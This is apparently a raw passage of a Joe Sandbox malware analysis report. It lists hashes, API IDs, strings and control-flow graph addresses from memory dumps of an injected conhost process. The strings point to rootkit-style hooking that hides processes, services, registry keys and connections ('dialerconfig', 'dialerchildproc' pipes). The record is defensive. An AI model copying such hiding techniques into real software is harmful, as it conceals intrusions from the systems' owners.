                                                  • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                  • Instruction Fuzzy Hash: E2112132714F0189EB00CF64E8653A833A4F759B58F880D21DA6D877A4DBB8C5A883C1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                  • Instruction ID: c059638013e607724c5f999c9c35c5bb00cda8a91e5cc2a4aa3d8156121c4046
                                                  • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                  • Instruction Fuzzy Hash: 8711C135701B4481EA04CF6AA4586A973A0FFC9FD0F8D4028CE8D43765DFB8C866C382
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                  • Instruction ID: ee5dcea4d92b1cb10f63190bd724da8d84a171ec4e7c569a4c42667e4d8e416e
                                                  • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                  • Instruction Fuzzy Hash: F851053270078089FB20DB7AA8547DE7BA1FB80F94F598114EE9867B99DB78C425C742
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                  • Instruction ID: 9aa004327c0c10178f2e00080e97c926fa3cfad0397867f5d5c5fd0c47b32502
                                                  • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                  • Instruction Fuzzy Hash: 81F062B37142958FDBE88F28E85275A77E1F788780FD48019D68983B08D27C8074CF59

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 106492572-2879589442
                                                  • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                  • Instruction ID: 461a903773e2140aa947bf022ece9a526d507e60cac8109777be68f120900551
                                                  • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                  • Instruction Fuzzy Hash: 4471DB36310A1086EB10DF69E8A1AD93364FBC4F98F891111DD8E97B69DF78C568C7C2

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                  • Instruction ID: c875e840d2e736cbc30be7cf95321ba14b17b0493c25330a098fafb3b702f81e
                                                  • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                  • Instruction Fuzzy Hash: 65519032200B8486EB54CF66E45539E77A1FBC9F95F894124DE8907728DFBCC469C782

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                  • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                  • API String ID: 4175298099-1975688563
                                                  • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                  • Instruction ID: 31d579ad6bb9645da41cf41c3be2aafd96578bafb4fad4f0cc707521ce8e8f02
                                                  • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                  • Instruction Fuzzy Hash: B8317E75100A5AA0EA04EF6DE872BD46321BFD4F54FCA5413980A175669FFC82ADC3D3

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 207 19a497d6910-19a497d6916 208 19a497d6918-19a497d691b 207->208 209 19a497d6951-19a497d695b 207->209 211 19a497d6945-19a497d6984 call 19a497d6fc0 208->211 212 19a497d691d-19a497d6920 208->212 210 19a497d6a78-19a497d6a8d 209->210 213 19a497d6a8f 210->213 214 19a497d6a9c-19a497d6ab6 call 19a497d6e54 210->214 230 19a497d6a52 211->230 231 19a497d698a-19a497d699f call 19a497d6e54 211->231 216 19a497d6938 __scrt_dllmain_crt_thread_attach 212->216 217 19a497d6922-19a497d6925 212->217 220 19a497d6a91-19a497d6a9b 213->220 228 19a497d6ab8-19a497d6aed call 19a497d6f7c call 19a497d6e1c call 19a497d7318 call 19a497d7130 call 19a497d7154 call 19a497d6fac 214->228 229 19a497d6aef-19a497d6b20 call 19a497d7190 214->229 222 19a497d693d-19a497d6944 216->222 218 19a497d6927-19a497d6930 217->218 219 19a497d6931-19a497d6936 call 19a497d6f04 217->219 219->222 228->220 239 19a497d6b22-19a497d6b28 229->239 240 19a497d6b31-19a497d6b37 229->240 234 19a497d6a54-19a497d6a69 230->234 242 19a497d69a5-19a497d69b6 call 19a497d6ec4 231->242 243 19a497d6a6a-19a497d6a77 call 19a497d7190 231->243 239->240 244 19a497d6b2a-19a497d6b2c 239->244 245 19a497d6b39-19a497d6b43 240->245 246 19a497d6b7e-19a497d6b94 call 19a497d268c 240->246 257 19a497d6a07-19a497d6a11 call 19a497d7130 242->257 258 19a497d69b8-19a497d69dc call 19a497d72dc call 19a497d6e0c call 19a497d6e38 call 19a497dac0c 242->258 243->210 252 19a497d6c1f-19a497d6c2c 244->252 253 19a497d6b45-19a497d6b4d 245->253 254 19a497d6b4f-19a497d6b5d call 19a497e5780 245->254 264 19a497d6b96-19a497d6b98 246->264 265 19a497d6bcc-19a497d6bce 246->265 260 19a497d6b63-19a497d6b78 call 19a497d6910 253->260 254->260 275 19a497d6c15-19a497d6c1d 254->275 257->230 278 19a497d6a13-19a497d6a1f call 19a497d7180 257->278 258->257 310 19a497d69de-19a497d69e5 __scrt_dllmain_after_initialize_c 258->310 260->246 260->275 264->265 272 19a497d6b9a-19a497d6bbc call 19a497d268c call 19a497d6a78 264->272 273 19a497d6bd5-19a497d6bea call 19a497d6910 265->273 274 19a497d6bd0-19a497d6bd3 265->274 272->265 304 19a497d6bbe-19a497d6bc6 call 19a497e5780 272->304 273->275 289 19a497d6bec-19a497d6bf6 273->289 274->273 274->275 275->252 297 19a497d6a45-19a497d6a50 278->297 298 19a497d6a21-19a497d6a2b call 19a497d7098 278->298 294 19a497d6bf8-19a497d6bff 289->294 295 19a497d6c01-19a497d6c11 call 19a497e5780 289->295 294->275 295->275 297->234 298->297 309 19a497d6a2d-19a497d6a3b 298->309 304->265 309->297 310->257 311 19a497d69e7-19a497d6a04 call 19a497dabc8 310->311 311->257
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                  • API String ID: 190073905-1786718095
                                                  • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction ID: 730d81e432a9fd9fa6a880a79fbe956ceaa4506082b272f929a785fc387b2305
                                                  • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction Fuzzy Hash: 9981D07160064186FB90AB6598F13D922D0EFC5F80FDC8225DA4D4779AEBF9C87D8782

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 0000019A4980CE37
                                                  • FlsGetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CE4C
                                                  • FlsSetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CE6D
                                                  • FlsSetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CE9A
                                                  • FlsSetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CEAB
                                                  • FlsSetValue.KERNEL32(?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CEBC
                                                  • SetLastError.KERNEL32 ref: 0000019A4980CED7
                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CF0D
                                                  • FlsSetValue.KERNEL32(?,?,00000001,0000019A4980ECCC,?,?,?,?,0000019A4980BF9F,?,?,?,?,?,0000019A49807AB0), ref: 0000019A4980CF2C
                                                    • Part of subcall function 0000019A4980D6CC: HeapAlloc.KERNEL32 ref: 0000019A4980D721
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CF54
                                                    • Part of subcall function 0000019A4980D744: HeapFree.KERNEL32 ref: 0000019A4980D75A
                                                    • Part of subcall function 0000019A4980D744: GetLastError.KERNEL32 ref: 0000019A4980D764
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CF65
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000019A49810A6B,?,?,?,0000019A4981045C,?,?,?,0000019A4980C84F), ref: 0000019A4980CF76
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                  • String ID:
                                                  • API String ID: 570795689-0
                                                  • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                  • Instruction ID: 2a6dd442582171b77d9af5411e7cb33ac6e05c6417dfa13bd58c6c24995340ac
                                                  • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                  • Instruction Fuzzy Hash: 7641C13124224441FA68AB7D95717E922415FE4FB0FEE8724A936476E7DFE8C42983C3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                  • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                  • API String ID: 2171963597-1373409510
                                                  • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                  • Instruction ID: ae9cd14cdb6de596b96e4f8cbce569bb7c32d6779aa4752aea3a7a7818378819
                                                  • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                  • Instruction Fuzzy Hash: F921413261474082F710CB29F45539A73A0FBC5BA4F990215EA9943BA8CFBCC55DCB82

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 465 19a497d9944-19a497d99ac call 19a497da814 468 19a497d9e13-19a497d9e1b call 19a497dbb48 465->468 469 19a497d99b2-19a497d99b5 465->469 469->468 471 19a497d99bb-19a497d99c1 469->471 472 19a497d99c7-19a497d99cb 471->472 473 19a497d9a90-19a497d9aa2 471->473 472->473 477 19a497d99d1-19a497d99dc 472->477 475 19a497d9aa8-19a497d9aac 473->475 476 19a497d9d63-19a497d9d67 473->476 475->476 478 19a497d9ab2-19a497d9abd 475->478 480 19a497d9d69-19a497d9d70 476->480 481 19a497d9da0-19a497d9daa call 19a497d8a34 476->481 477->473 479 19a497d99e2-19a497d99e7 477->479 478->476 482 19a497d9ac3-19a497d9aca 478->482 479->473 483 19a497d99ed-19a497d99f7 call 19a497d8a34 479->483 480->468 484 19a497d9d76-19a497d9d9b call 19a497d9e1c 480->484 481->468 494 19a497d9dac-19a497d9dcb call 19a497d6d40 481->494 486 19a497d9c94-19a497d9ca0 482->486 487 19a497d9ad0-19a497d9b07 call 19a497d8e10 482->487 483->494 498 19a497d99fd-19a497d9a28 call 19a497d8a34 * 2 call 19a497d9124 483->498 484->481 486->481 491 19a497d9ca6-19a497d9caa 486->491 487->486 502 19a497d9b0d-19a497d9b15 487->502 495 19a497d9cba-19a497d9cc2 491->495 496 19a497d9cac-19a497d9cb8 call 19a497d90e4 491->496 495->481 501 19a497d9cc8-19a497d9cd5 call 19a497d8cb4 495->501 496->495 509 19a497d9cdb-19a497d9ce3 496->509 533 19a497d9a48-19a497d9a52 call 19a497d8a34 498->533 534 19a497d9a2a-19a497d9a2e 498->534 501->481 501->509 507 19a497d9b19-19a497d9b4b 502->507 511 19a497d9c87-19a497d9c8e 507->511 512 19a497d9b51-19a497d9b5c 507->512 514 19a497d9df6-19a497d9e12 call 19a497d8a34 * 2 call 19a497dbaa8 509->514 515 19a497d9ce9-19a497d9ced 509->515 511->486 511->507 512->511 516 19a497d9b62-19a497d9b7b 512->516 514->468 518 19a497d9cef-19a497d9cfe call 19a497d90e4 515->518 519 19a497d9d00 515->519 520 19a497d9c74-19a497d9c79 516->520 521 19a497d9b81-19a497d9bc6 call 19a497d90f8 * 2 516->521 529 19a497d9d03-19a497d9d0d call 19a497da8ac 518->529 519->529 525 19a497d9c84 520->525 549 19a497d9bc8-19a497d9bee call 19a497d90f8 call 19a497da038 521->549 550 19a497d9c04-19a497d9c0a 521->550 525->511 529->481 541 19a497d9d13-19a497d9d61 call 19a497d8d44 call 19a497d8f50 529->541 533->473 548 19a497d9a54-19a497d9a74 call 19a497d8a34 * 2 call 19a497da8ac 533->548 534->533 540 19a497d9a30-19a497d9a3b 534->540 540->533 545 19a497d9a3d-19a497d9a42 540->545 541->481 545->468 545->533 571 19a497d9a76-19a497d9a80 call 19a497da99c 548->571 572 19a497d9a8b 548->572 565 19a497d9c15-19a497d9c72 call 19a497d9870 549->565 566 19a497d9bf0-19a497d9c02 549->566 554 19a497d9c7b 550->554 555 19a497d9c0c-19a497d9c10 550->555 559 19a497d9c80 554->559 555->521 559->525 565->559 566->549 566->550 575 19a497d9a86-19a497d9def call 19a497d86ac call 19a497da3f4 call 19a497d88a0 571->575 576 19a497d9df0-19a497d9df5 call 19a497dbaa8 571->576 572->473 575->576 576->514
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                  • Instruction ID: c09033f0a1b981d08a1ec5406a073a57c41741d07ad874944e4fdc6a0340afb6
                                                  • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                  • Instruction Fuzzy Hash: A5E1AE32601B408AEB609F65D4913DD77A0FBC5F98F980215EE8D57B9ACB74C0B9C782

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 586 19a4980a544-19a4980a5ac call 19a4980b414 589 19a4980a5b2-19a4980a5b5 586->589 590 19a4980aa13-19a4980aa1b call 19a4980c748 586->590 589->590 591 19a4980a5bb-19a4980a5c1 589->591 593 19a4980a690-19a4980a6a2 591->593 594 19a4980a5c7-19a4980a5cb 591->594 596 19a4980a963-19a4980a967 593->596 597 19a4980a6a8-19a4980a6ac 593->597 594->593 598 19a4980a5d1-19a4980a5dc 594->598 601 19a4980a9a0-19a4980a9aa call 19a49809634 596->601 602 19a4980a969-19a4980a970 596->602 597->596 599 19a4980a6b2-19a4980a6bd 597->599 598->593 600 19a4980a5e2-19a4980a5e7 598->600 599->596 603 19a4980a6c3-19a4980a6ca 599->603 600->593 604 19a4980a5ed-19a4980a5f7 call 19a49809634 600->604 601->590 612 19a4980a9ac-19a4980a9cb call 19a49807940 601->612 602->590 605 19a4980a976-19a4980a99b call 19a4980aa1c 602->605 607 19a4980a6d0-19a4980a707 call 19a49809a10 603->607 608 19a4980a894-19a4980a8a0 603->608 604->612 620 19a4980a5fd-19a4980a628 call 19a49809634 * 2 call 19a49809d24 604->620 605->601 607->608 624 19a4980a70d-19a4980a715 607->624 608->601 613 19a4980a8a6-19a4980a8aa 608->613 617 19a4980a8ba-19a4980a8c2 613->617 618 19a4980a8ac-19a4980a8b8 call 19a49809ce4 613->618 617->601 623 19a4980a8c8-19a4980a8d5 call 19a498098b4 617->623 618->617 630 19a4980a8db-19a4980a8e3 618->630 652 19a4980a62a-19a4980a62e 620->652 653 19a4980a648-19a4980a652 call 19a49809634 620->653 623->601 623->630 628 19a4980a719-19a4980a74b 624->628 632 19a4980a751-19a4980a75c 628->632 633 19a4980a887-19a4980a88e 628->633 635 19a4980a9f6-19a4980aa12 call 19a49809634 * 2 call 19a4980c6a8 630->635 636 19a4980a8e9-19a4980a8ed 630->636 632->633 637 19a4980a762-19a4980a77b 632->637 633->608 633->628 635->590 639 19a4980a8ef-19a4980a8fe call 19a49809ce4 636->639 640 19a4980a900 636->640 641 19a4980a781-19a4980a7c6 call 19a49809cf8 * 2 637->641 642 19a4980a874-19a4980a879 637->642 645 19a4980a903-19a4980a90d call 19a4980b4ac 639->645 640->645 667 19a4980a804-19a4980a80a 641->667 668 19a4980a7c8-19a4980a7ee call 19a49809cf8 call 19a4980ac38 641->668 648 19a4980a884 642->648 645->601 665 19a4980a913-19a4980a961 call 19a49809944 call 19a49809b50 645->665 648->633 652->653 659 19a4980a630-19a4980a63b 652->659 653->593 671 19a4980a654-19a4980a674 call 19a49809634 * 2 call 19a4980b4ac 653->671 659->653 664 19a4980a63d-19a4980a642 659->664 664->590 664->653 665->601 675 19a4980a87b 667->675 676 19a4980a80c-19a4980a810 667->676 686 19a4980a7f0-19a4980a802 668->686 687 19a4980a815-19a4980a872 call 19a4980a470 668->687 692 19a4980a68b 671->692 693 19a4980a676-19a4980a680 call 19a4980b59c 671->693 680 19a4980a880 675->680 676->641 680->648 686->667 686->668 687->680 692->593 696 19a4980a9f0-19a4980a9f5 call 19a4980c6a8 693->696 697 19a4980a686-19a4980a9ef call 19a498092ac call 19a4980aff4 call 19a498094a0 693->697 696->635 697->696
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                  • Instruction ID: 76e8720ca1a3c99e010eb022e75d3a32ccb1031593c8be2df320e50c0243e868
                                                  • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                  • Instruction Fuzzy Hash: EDE1BE72600B408AEB20CF29D4A53DD77E0FB94F98F9A0105EE9957B95CB74C0A9C783

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeLibraryProc
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3013587201-537541572
                                                  • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                  • Instruction ID: 2ed146d3057c6c49e4f56a0d0a736a330cb6a67c05c6e75c575fbdd847920f9c
                                                  • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                  • Instruction Fuzzy Hash: 5041C232355A0081EA16CB5EA8247D56391BFC5FA0F9EC1299D0997785EFB8C46D83C3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                  • Instruction ID: 81421891136cda26d800f597b63a0a572ada078ec85c4fc4e2069daba07c6482
                                                  • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                  • Instruction Fuzzy Hash: 21419033214B84C6E764CF25E4547AE77A1F788F98F888129DB8907B58DF78C459CB82

                                                  Control-flow Graph

                                                  APIs
                                                  • FlsGetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D087
                                                  • FlsSetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D0A6
                                                  • FlsSetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D0CE
                                                  • FlsSetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D0DF
                                                  • FlsSetValue.KERNEL32(?,?,?,0000019A4980C7DE,?,?,?,?,?,?,?,?,0000019A4980CF9D,?,?,00000001), ref: 0000019A4980D0F0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID: 1%$Y%
                                                  • API String ID: 3702945584-1395475152
                                                  • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                  • Instruction ID: 5fcbe71bc225ec4500b3ed4646bd9a5a61285451cd13644de104bb13e0684e9d
                                                  • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                  • Instruction Fuzzy Hash: 7E117F3070438441FA68976D59717E961415FD4FF0FAE9324993D476DADFA8C43A8383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction ID: 42ae73901b6c7a130b8382b7fa6da2bf35f6e55c5697a71cb4044f6b79c72f84
                                                  • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction Fuzzy Hash: 4081D2316102418AFA50AB6D9C727D97290AFC5F80FDE4425994A83396DBF8C87D87C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                  • Instruction ID: 3004187cbeb5987bedd6abc898dab1627cc4a956e18005bee3eadf78b3d99c81
                                                  • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                  • Instruction Fuzzy Hash: 1931C531212640E1EE21DB0AA8207D52794BFC8FA0FAE05259E5D47794DFFAC86DC393
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                  • Instruction ID: af0291ba1ff7741a13bcfa7dd1c96fdd6191904a3ee4640b208147064e4ece9d
                                                  • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                  • Instruction Fuzzy Hash: 1E11B631314B4082E7508B5AE86535973A4FBD8FE4F9C0215EA5A87794CFB8C828C7C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
